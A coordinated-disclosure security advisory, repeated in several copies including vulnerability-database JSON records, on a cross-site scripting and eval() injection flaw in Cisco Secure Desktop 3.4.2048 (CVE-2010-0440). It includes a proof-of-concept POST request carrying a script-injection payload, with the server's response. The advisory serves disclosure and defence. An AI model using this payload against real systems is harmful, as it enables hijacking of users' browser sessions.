Title: Cisco Secure Desktop XSS/JavaScript Injection
Advisory Id: CORE-2010-0106
Advisory URL: http://www.coresecurity.com/content/cisco-secure-desktop-xss
Date published: 2010-02-01
Date of last update: 2010-02-01
Vendors contacted: Cisco
Release mode: Coordinated release
Vulnerability Information
Class: Cross site scripting [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 37960
CVE Name: CVE-2010-0440
Vulnerability Description
The Cisco Secure Desktop web application does not sufficiently verify if
a well-formed request was provided by the user who submitted the POST
request, resulting in a cross-site scripting vulnerability.
In order to be able to sucessfully make the attack, the Secure Desktop
application on the Cisco Appliance must be turned on.
Vulnerable packages
. Cisco Secure Desktop 3.4.2048
. Older versions are probably affected too, but they were not checked.
This vulnerability was discovered and researched by Matias Pablo Brutti
from Core Security Technologies.
The publication of this advisory was coordinated by Jorge Lucangeli Obes
from Core Security Technologies Advisories Team.
Technical Description / Proof of Concept Code
Cross-site scripting (XSS) vulnerabilities allow an attacker to execute
arbitrary scripting code in the context of the user browser (in the
vulnerable application's domain). For example, an attacker could exploit
an XSS vulnerability to steal user cookies (and then impersonate the
legitimate user) or fake a page requesting information to the user
(i.e.: credentials). This vulnerability occurs when user-supplied data
is displayed without encoding.
The Cisco Secure Desktop web application does not sufficiently verify if
a well-formed request was provided by the user who submitted the POST
request. The cross-site scripting vulnerability was found in the
following file/url:
-----/
The content of the POST field is not being encoded at the time of using
them in HTML output, therefore allowing an attacker who controls their
content to insert JavaScript code. Furthermore, we could possibly inject
JavaScript code into the 'start.html' page because the content of the
previously mentioned POST is used in 'binary/mainv.js' as input for an
'eval()' function, hence allowing an attacker to inject any code without
restrictions which will be executed in the context of the 'eval()'
function:
/-----
282 http_request.open('POST', path, false);
283 http_request.send(msgs);
284 var trans = new Array();
285 try {
286 eval(http_request.responseText);
287 } catch (e) {}
. 2010-01-12:
Cisco replies, saying that it will investigate the report.
. 2010-01-12:
Cisco tentatively acknowledges the February 5th release date.
. 2010-01-13:
Core replies, reassuring that the release date can be moved if Cisco
can't meet it.
. 2010-01-13:
Cisco updates, pointing to a beta version of Cisco Secure Desktop that
contains a fix for the vulnerability.
. 2010-01-13:
Cisco describes the fix and the non-vulnerable versions of the package.
. 2010-01-14:
Cisco confirms the February 5th release date.
. 2010-01-14:
Core acknowledges this release date.
. 2010-01-25:
Core asks for clarification on the non-vulnerable versions of the package.
. 2010-01-25:
Cisco replies with the non-vulnerable version of Cisco Secure Desktop.
. 2010-01-26:
Given that the non-vulnerable version of Cisco Secure Desktop has
already been released, Core requests to move the release date forward,
to February 1st.
. 2010-01-26:
Cisco agrees to move the release date forward.
. 2010-02-01:
The advisory CORE-2010-0106 is published.
About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.
About Core Security Technologies
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
Disclaimer
The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
{"id": "SECURITYVULNS:DOC:23156", "bulletinFamily": "software", "title": "[CORE-2010-0106] Cisco Secure Desktop XSS/JavaScript Injection", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - CoreLabs Advisory\r\n http://www.coresecurity.com/corelabs/\r\n\r\nCisco Secure Desktop XSS/JavaScript Injection\r\n\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Cisco Secure Desktop XSS/JavaScript Injection\r\nAdvisory Id: CORE-2010-0106\r\nAdvisory URL: http://www.coresecurity.com/content/cisco-secure-desktop-xss\r\nDate published: 2010-02-01\r\nDate of last update: 2010-02-01\r\nVendors contacted: Cisco\r\nRelease mode: Coordinated release\r\n\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Cross site scripting [CWE-79]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nBugtraq ID: 37960\r\nCVE Name: CVE-2010-0440\r\n\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nThe Cisco Secure Desktop web application does not sufficiently verify if\r\na well-formed request was provided by the user who submitted the POST\r\nrequest, resulting in a cross-site scripting vulnerability.\r\n\r\nIn order to be able to sucessfully make the attack, the Secure Desktop\r\napplication on the Cisco Appliance must be turned on.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . Cisco Secure Desktop 3.4.2048\r\n . Older versions are probably affected too, but they were not checked.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . Cisco Secure Desktop 3.5.841\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nCisco Security Alert:\r\nhttp://tools.cisco.com/security/center/viewAlert.x?alertId=19843\r\n\r\n\r\n7. *Credits*\r\n\r\nThis vulnerability was discovered and researched by Matias Pablo Brutti\r\nfrom Core Security Technologies.\r\n\r\nThe publication of this advisory was coordinated by Jorge Lucangeli Obes\r\nfrom Core Security Technologies Advisories Team.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\nCross-site scripting (XSS) vulnerabilities allow an attacker to execute\r\narbitrary scripting code in the context of the user browser (in the\r\nvulnerable application's domain). For example, an attacker could exploit\r\nan XSS vulnerability to steal user cookies (and then impersonate the\r\nlegitimate user) or fake a page requesting information to the user\r\n(i.e.: credentials). This vulnerability occurs when user-supplied data\r\nis displayed without encoding.\r\n\r\nThe Cisco Secure Desktop web application does not sufficiently verify if\r\na well-formed request was provided by the user who submitted the POST\r\nrequest. The cross-site scripting vulnerability was found in the\r\nfollowing file/url:\r\n\r\n/-----\r\nhttps://{IP}//+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us\r\n\r\n- -----/\r\n Using the POST variable:\r\n\r\n/-----\r\nStarting, please wait..."><script>alert(1);</script>\r\n\r\n- -----/\r\n The content of the POST field is not being encoded at the time of using\r\nthem in HTML output, therefore allowing an attacker who controls their\r\ncontent to insert JavaScript code. Furthermore, we could possibly inject\r\nJavaScript code into the 'start.html' page because the content of the\r\npreviously mentioned POST is used in 'binary/mainv.js' as input for an\r\n'eval()' function, hence allowing an attacker to inject any code without\r\nrestrictions which will be executed in the context of the 'eval()'\r\nfunction:\r\n\r\n/-----\r\n282 http_request.open('POST', path, false);\r\n283 http_request.send(msgs);\r\n284 var trans = new Array();\r\n285 try {\r\n286 eval(http_request.responseText);\r\n287 } catch (e) {}\r\n\r\n- -----/\r\n\r\n\r\n\r\n8.1. *Proof of Concept*\r\n\r\n\r\n\r\n/-----\r\nREQUEST:\r\nPOST\r\nhttps://{IP}/+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us\r\nHTTP/1.1\r\nHost: {IP}\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9)\r\nGecko/2008052906 Firefox/3.0 (.NET CLR 3.5.30729)\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nReferer: https://{IP}/CACHE/sdesktop/install/start.htm\r\nContent-Type: application/xml; charset=UTF-8\r\nCookie: webvpnLang=en-us; webvpnlogin=1\r\nPragma: no-cache\r\nCache-Control: no-cache\r\nContent-Length: 56\r\n\r\nStarting, please wait..."><script>alert(1);</script>\r\n\r\nRESPONSE:\r\nHTTP/1.1 200 OK\r\nServer: Cisco AWARE 2.0\r\nContent-Type: text/html; charset=UTF-8\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nConnection: Keep-Alive\r\nDate: Mon, 16 Nov 2009 14:14:07 GMT\r\nContent-Length: 122\r\n\r\ntrans["Starting, please wait...\"><script>alert(1);</script>"] =\r\n"Starting, please wait...\"><script>alert(1);</script>";\r\n\r\n- -----/\r\n\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2010-01-12:\r\nVendor contacted.\r\n\r\n. 2010-01-12:\r\nCisco replies, saying that it will investigate the report.\r\n\r\n. 2010-01-12:\r\nCisco tentatively acknowledges the February 5th release date.\r\n\r\n. 2010-01-13:\r\nCore replies, reassuring that the release date can be moved if Cisco\r\ncan't meet it.\r\n\r\n. 2010-01-13:\r\nCisco updates, pointing to a beta version of Cisco Secure Desktop that\r\ncontains a fix for the vulnerability.\r\n\r\n. 2010-01-13:\r\nCisco describes the fix and the non-vulnerable versions of the package.\r\n\r\n. 2010-01-14:\r\nCisco confirms the February 5th release date.\r\n\r\n. 2010-01-14:\r\nCore acknowledges this release date.\r\n\r\n. 2010-01-25:\r\nCore asks for clarification on the non-vulnerable versions of the package.\r\n\r\n. 2010-01-25:\r\nCisco replies with the non-vulnerable version of Cisco Secure Desktop.\r\n\r\n. 2010-01-26:\r\nGiven that the non-vulnerable version of Cisco Secure Desktop has\r\nalready been released, Core requests to move the release date forward,\r\nto February 1st.\r\n\r\n. 2010-01-26:\r\nCisco agrees to move the release date forward.\r\n\r\n. 2010-02-01:\r\nThe advisory CORE-2010-0106 is published.\r\n\r\n\r\n\r\n10. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://www.coresecurity.com/corelabs.\r\n\r\n\r\n11. *About Core Security Technologies*\r\n\r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n12. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2010 Core Security\r\nTechnologies and (c) 2010 CoreLabs, and may be distributed freely\r\nprovided that no fee is charged for this distribution and proper credit\r\nis given.\r\n\r\n\r\n13. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.6 (GNU/Linux)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niD8DBQFLZy9lyNibggitWa0RAgTRAJ4lKTa+knGNpaqk+RwUe26bQEJBIwCeOrL1\r\nB1t5rEq+DQYMZvLTaVhyDio=\r\n=g4gM\r\n-----END PGP SIGNATURE-----", "published": "2010-02-04T00:00:00", "modified": "2010-02-04T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23156", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2010-0440"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:33", "edition": 1, "viewCount": 30, "enchantments": {"score": {"value": 7.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cisco", "idList": ["CISCO-SA-20100201-CVE-2010-0440"]}, {"type": "cve", "idList": ["CVE-2010-0440"]}, {"type": "dsquare", "idList": ["E-41"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:85827"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10582"]}]}, "exploitation": null, "vulnersScore": 7.0}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645347057}}
{"packetstorm": [{"lastseen": "2016-12-05T22:11:47", "description": "", "cvss3": {}, "published": "2010-02-02T00:00:00", "type": "packetstorm", "title": "Core Security Technologies Advisory 2010.0106", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-0440"], "modified": "2010-02-02T00:00:00", "id": "PACKETSTORM:85827", "href": "https://packetstormsecurity.com/files/85827/Core-Security-Technologies-Advisory-2010.0106.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nCore Security Technologies - CoreLabs Advisory \nhttp://www.coresecurity.com/corelabs/ \n \nCisco Secure Desktop XSS/JavaScript Injection \n \n \n \n1. *Advisory Information* \n \nTitle: Cisco Secure Desktop XSS/JavaScript Injection \nAdvisory Id: CORE-2010-0106 \nAdvisory URL: http://www.coresecurity.com/content/cisco-secure-desktop-xss \nDate published: 2010-02-01 \nDate of last update: 2010-02-01 \nVendors contacted: Cisco \nRelease mode: Coordinated release \n \n \n \n2. *Vulnerability Information* \n \nClass: Cross site scripting [CWE-79] \nImpact: Code execution \nRemotely Exploitable: Yes \nLocally Exploitable: No \nBugtraq ID: 37960 \nCVE Name: CVE-2010-0440 \n \n \n \n3. *Vulnerability Description* \n \nThe Cisco Secure Desktop web application does not sufficiently verify if \na well-formed request was provided by the user who submitted the POST \nrequest, resulting in a cross-site scripting vulnerability. \n \nIn order to be able to sucessfully make the attack, the Secure Desktop \napplication on the Cisco Appliance must be turned on. \n \n \n4. *Vulnerable packages* \n \n. Cisco Secure Desktop 3.4.2048 \n. Older versions are probably affected too, but they were not checked. \n \n \n5. *Non-vulnerable packages* \n \n. Cisco Secure Desktop 3.5.841 \n \n \n6. *Vendor Information, Solutions and Workarounds* \n \nCisco Security Alert: \nhttp://tools.cisco.com/security/center/viewAlert.x?alertId=19843 \n \n \n7. *Credits* \n \nThis vulnerability was discovered and researched by Matias Pablo Brutti \nfrom Core Security Technologies. \n \nThe publication of this advisory was coordinated by Jorge Lucangeli Obes \nfrom Core Security Technologies Advisories Team. \n \n \n8. *Technical Description / Proof of Concept Code* \n \nCross-site scripting (XSS) vulnerabilities allow an attacker to execute \narbitrary scripting code in the context of the user browser (in the \nvulnerable application's domain). For example, an attacker could exploit \nan XSS vulnerability to steal user cookies (and then impersonate the \nlegitimate user) or fake a page requesting information to the user \n(i.e.: credentials). This vulnerability occurs when user-supplied data \nis displayed without encoding. \n \nThe Cisco Secure Desktop web application does not sufficiently verify if \na well-formed request was provided by the user who submitted the POST \nrequest. The cross-site scripting vulnerability was found in the \nfollowing file/url: \n \n/----- \nhttps://{IP}//+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us \n \n- -----/ \nUsing the POST variable: \n \n/----- \nStarting, please wait...\"><script>alert(1);</script> \n \n- -----/ \nThe content of the POST field is not being encoded at the time of using \nthem in HTML output, therefore allowing an attacker who controls their \ncontent to insert JavaScript code. Furthermore, we could possibly inject \nJavaScript code into the 'start.html' page because the content of the \npreviously mentioned POST is used in 'binary/mainv.js' as input for an \n'eval()' function, hence allowing an attacker to inject any code without \nrestrictions which will be executed in the context of the 'eval()' \nfunction: \n \n/----- \n282 http_request.open('POST', path, false); \n283 http_request.send(msgs); \n284 var trans = new Array(); \n285 try { \n286 eval(http_request.responseText); \n287 } catch (e) {} \n \n- -----/ \n \n \n \n8.1. *Proof of Concept* \n \n \n \n/----- \nREQUEST: \nPOST \nhttps://{IP}/+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us \nHTTP/1.1 \nHost: {IP} \nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) \nGecko/2008052906 Firefox/3.0 (.NET CLR 3.5.30729) \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate \nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 \nKeep-Alive: 300 \nConnection: keep-alive \nReferer: https://{IP}/CACHE/sdesktop/install/start.htm \nContent-Type: application/xml; charset=UTF-8 \nCookie: webvpnLang=en-us; webvpnlogin=1 \nPragma: no-cache \nCache-Control: no-cache \nContent-Length: 56 \n \nStarting, please wait...\"><script>alert(1);</script> \n \nRESPONSE: \nHTTP/1.1 200 OK \nServer: Cisco AWARE 2.0 \nContent-Type: text/html; charset=UTF-8 \nCache-Control: no-cache \nPragma: no-cache \nConnection: Keep-Alive \nDate: Mon, 16 Nov 2009 14:14:07 GMT \nContent-Length: 122 \n \ntrans[\"Starting, please wait...\\\"><script>alert(1);</script>\"] = \n\"Starting, please wait...\\\"><script>alert(1);</script>\"; \n \n- -----/ \n \n \n \n9. *Report Timeline* \n \n. 2010-01-12: \nVendor contacted. \n \n. 2010-01-12: \nCisco replies, saying that it will investigate the report. \n \n. 2010-01-12: \nCisco tentatively acknowledges the February 5th release date. \n \n. 2010-01-13: \nCore replies, reassuring that the release date can be moved if Cisco \ncan't meet it. \n \n. 2010-01-13: \nCisco updates, pointing to a beta version of Cisco Secure Desktop that \ncontains a fix for the vulnerability. \n \n. 2010-01-13: \nCisco describes the fix and the non-vulnerable versions of the package. \n \n. 2010-01-14: \nCisco confirms the February 5th release date. \n \n. 2010-01-14: \nCore acknowledges this release date. \n \n. 2010-01-25: \nCore asks for clarification on the non-vulnerable versions of the package. \n \n. 2010-01-25: \nCisco replies with the non-vulnerable version of Cisco Secure Desktop. \n \n. 2010-01-26: \nGiven that the non-vulnerable version of Cisco Secure Desktop has \nalready been released, Core requests to move the release date forward, \nto February 1st. \n \n. 2010-01-26: \nCisco agrees to move the release date forward. \n \n. 2010-02-01: \nThe advisory CORE-2010-0106 is published. \n \n \n \n10. *About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is charged \nwith anticipating the future needs and requirements for information \nsecurity technologies. We conduct our research in several important \nareas of computer security including system vulnerabilities, cyber \nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of \nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers, \nproject information and shared software tools for public use at: \nhttp://www.coresecurity.com/corelabs. \n \n \n11. *About Core Security Technologies* \n \nCore Security Technologies develops strategic solutions that help \nsecurity-conscious organizations worldwide develop and maintain a \nproactive process for securing their networks. The company's flagship \nproduct, CORE IMPACT, is the most comprehensive product for performing \nenterprise security assurance testing. CORE IMPACT evaluates network, \nendpoint and end-user vulnerabilities and identifies what resources are \nexposed. It enables organizations to determine if current security \ninvestments are detecting and preventing attacks. Core Security \nTechnologies augments its leading technology solution with world-class \nsecurity consulting services, including penetration testing and software \nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core \nSecurity Technologies can be reached at 617-399-6980 or on the Web at \nhttp://www.coresecurity.com. \n \n \n12. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2010 Core Security \nTechnologies and (c) 2010 CoreLabs, and may be distributed freely \nprovided that no fee is charged for this distribution and proper credit \nis given. \n \n \n13. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.6 (GNU/Linux) \nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org \n \niD8DBQFLZy9lyNibggitWa0RAgTRAJ4lKTa+knGNpaqk+RwUe26bQEJBIwCeOrL1 \nB1t5rEq+DQYMZvLTaVhyDio= \n=g4gM \n-----END PGP SIGNATURE----- \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/85827/CORE-2010-0106.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "securityvulns": [{"lastseen": "2021-06-08T18:51:30", "description": "Crossite scripting via POST request to https://{IP}//+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us", "edition": 2, "cvss3": {}, "published": "2010-02-04T00:00:00", "title": "Cisco Secure Desktop crossite scripting", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-0440"], "modified": "2010-02-04T00:00:00", "id": "SECURITYVULNS:VULN:10582", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10582", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "cisco": [{"lastseen": "2022-03-12T03:56:36", "description": "Cisco Secure Desktop contains a vulnerability that could allow an unauthenticated, remote attacker to conduct cross-site scripting attacks.\n\nThe vulnerability is due to a lack of input sanitation in the Cisco Secure Desktop. An unauthenticated, remote attacker could exploit this vulnerability by convincing a targeted user to visit a malicious website that is designed to submit an HTTP POST request to the web interface of the affected product. If the targeted user visits the malicious page, the attacker could execute arbitrary script code in the browser of the user in the security context of the affected site.\n\nProof-of-concept code is publicly available.\n\nCisco has confirmed this vulnerability and released updated software.\n\nTo exploit this vulnerability, an attacker must convince a targeted user to visit a malicious website. Performing an exploit will likely require the attacker to use social engineering tactics, such as sending targeted users a link to the site via e-mail, instant messaging, or another form of communication.\n\nCisco would like to thank Matias Pablo Brutti and Ernesto Alvarez from Core Security Technologies for discovering this vulnerability.\n\nBecause of changes made in Cisco Secure Desktop 3.5, Cisco ASA with an older version of ASA firmware but with Cisco Secure Desktop 3.5 or later will not be affected by this vulnerability.\n\nThe problem is fixed for Cisco ASA firmware version\n8.0(5) and later.", "cvss3": {}, "published": "2010-02-01T19:54:02", "type": "cisco", "title": "Cisco Secure Desktop Remote Cross-Site Scripting Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0440"], "modified": "2012-07-14T14:25:00", "id": "CISCO-SA-20100201-CVE-2010-0440", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20100201-CVE-2010-0440", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "coresecurity": [{"lastseen": "2021-08-16T18:18:14", "description": "### 1\\. Advisory Information\n\n**Title: **Cisco Secure Desktop XSS/JavaScript Injection \n**Advisory Id: **CORE-2010-0106 \n**Advisory URL: **http://www.coresecurity.com/core-labs/advisories/cisco-secure-desktop-xss \n**Date published: **2010-02-01 \n**Date of last update: **2010-02-01 \n**Vendors contacted: **Cisco \n**Release mode: **Coordinated release\n\n### 2\\. Vulnerability Information\n\n**Class: **Cross site scripting [[CWE-79](<http://cwe.mitre.org/data/definitions/79.html>)] \n**Impact: **Code execution \n**Remotely Exploitable: **Yes \n**Locally Exploitable: **No \n**Bugtraq ID: **[37960](<http://www.securityfocus.com/bid/37960>) \n**CVE Name: **[CVE-2010-0440](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-0440>)\n\n### 3\\. Vulnerability Description\n\nThe Cisco Secure Desktop web application does not sufficiently verify if a well-formed request was provided by the user who submitted the POST request, resulting in a cross-site scripting vulnerability.\n\nIn order to be able to sucessfully make the attack, the Secure Desktop application on the Cisco Appliance must be turned on.\n\n### 4\\. Vulnerable packages\n\n * Cisco Secure Desktop 3.4.2048\n * Older versions are probably affected too, but they were not checked.\n\n### 5\\. Non-vulnerable packages\n\n * Cisco Secure Desktop 3.5.841\n\n### 6\\. Vendor Information, Solutions and Workarounds\n\nCisco Security Alert: <http://tools.cisco.com/security/center/viewAlert.x?alertId=19843>\n\n### 7\\. Credits\n\nThis vulnerability was discovered and researched by Matias Pablo Brutti from Core Security Technologies.\n\nThe publication of this advisory was coordinated by Jorge Lucangeli Obes from Core Security Technologies Advisories Team.\n\n### 8\\. Technical Description / Proof of Concept Code\n\nCross-site scripting (XSS) vulnerabilities allow an attacker to execute arbitrary scripting code in the context of the user browser (in the vulnerable application's domain). For example, an attacker could exploit an XSS vulnerability to steal user cookies (and then impersonate the legitimate user) or fake a page requesting information to the user (i.e.: credentials). This vulnerability occurs when user-supplied data is displayed without encoding.\n\nThe Cisco Secure Desktop web application does not sufficiently verify if a well-formed request was provided by the user who submitted the POST request. The cross-site scripting vulnerability was found in the following file/url:\n \n \n https://{IP}//+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us \n\nUsing the POST variable:\n \n \n Starting, please wait...\"><script>alert(1);</script> \n\nThe content of the POST field is not being encoded at the time of using them in HTML output, therefore allowing an attacker who controls their content to insert JavaScript code. Furthermore, we could possibly inject JavaScript code into the `start.html` page because the content of the previously mentioned POST is used in `binary/mainv.js` as input for an `eval()` function, hence allowing an attacker to inject any code without restrictions which will be executed in the context of the `eval()` function:\n \n \n 282 http_request.open('POST', path, false); 283 http_request.send(msgs); 284 var trans = new Array(); \n 285 try { 286 eval(http_request.responseText); 287 } catch (e) {} \n\n#### 8.1. Proof of Concept\n \n \n REQUEST: POST https://{IP}/+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us HTTP/1.1 \n Host: {IP} User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 \n Firefox/3.0 (.NET CLR 3.5.30729) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*\n /*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-\n 1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: https://{IP}/CACHE/sdesktop\n /install/start.htm Content-Type: application/xml; charset=UTF-8 Cookie: webvpnLang=en-us; \n webvpnlogin=1 Pragma: no-cache Cache-Control: no-cache Content-Length: 56 Starting, please \n wait...\"><script>alert(1);</script> RESPONSE: HTTP/1.1 200 OK Server: Cisco AWARE 2.0 Content\n -Type: text/html; charset=UTF-8 Cache-Control: no-cache Pragma: no-cache Connection: Keep-Alive \n Date: Mon, 16 Nov 2009 14:14:07 GMT Content-Length: 122 trans[\"Starting, please wait...\\\">\n <script>alert(1);</script>\"] = \"Starting, please wait...\\\"><script>alert(1);</script>\"; \n\n### 9\\. Report Timeline\n\n * **2010-01-12: **Vendor contacted.\n * **2010-01-12: **Cisco replies, saying that it will investigate the report.\n * **2010-01-12: **Cisco tentatively acknowledges the February 5th release date.\n * **2010-01-13: **Core replies, reassuring that the release date can be moved if Cisco can't meet it.\n * **2010-01-13: **Cisco updates, pointing to a beta version of Cisco Secure Desktop that contains a fix for the vulnerability.\n * **2010-01-13: **Cisco describes the fix and the non-vulnerable versions of the package.\n * **2010-01-14: **Cisco confirms the February 5th release date.\n * **2010-01-14: **Core acknowledges this release date.\n * **2010-01-25: **Core asks for clarification on the non-vulnerable versions of the package.\n * **2010-01-25: **Cisco replies with the non-vulnerable version of Cisco Secure Desktop.\n * **2010-01-26: **Given that the non-vulnerable version of Cisco Secure Desktop has already been released, Core requests to move the release date forward, to February 1st.\n * **2010-01-26: **Cisco agrees to move the release date forward.\n * **2010-02-01: **The advisory CORE-2010-0106 is published.\n\n### 10\\. About CoreLabs\n\nCoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: https://www.coresecurity.com/core-labs.\n\n### 11\\. About Core Security Technologies\n\nCore Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Core Security Technologies can be reached at https://www.coresecurity.com.\n\n### 12\\. Disclaimer\n\nThe contents of this 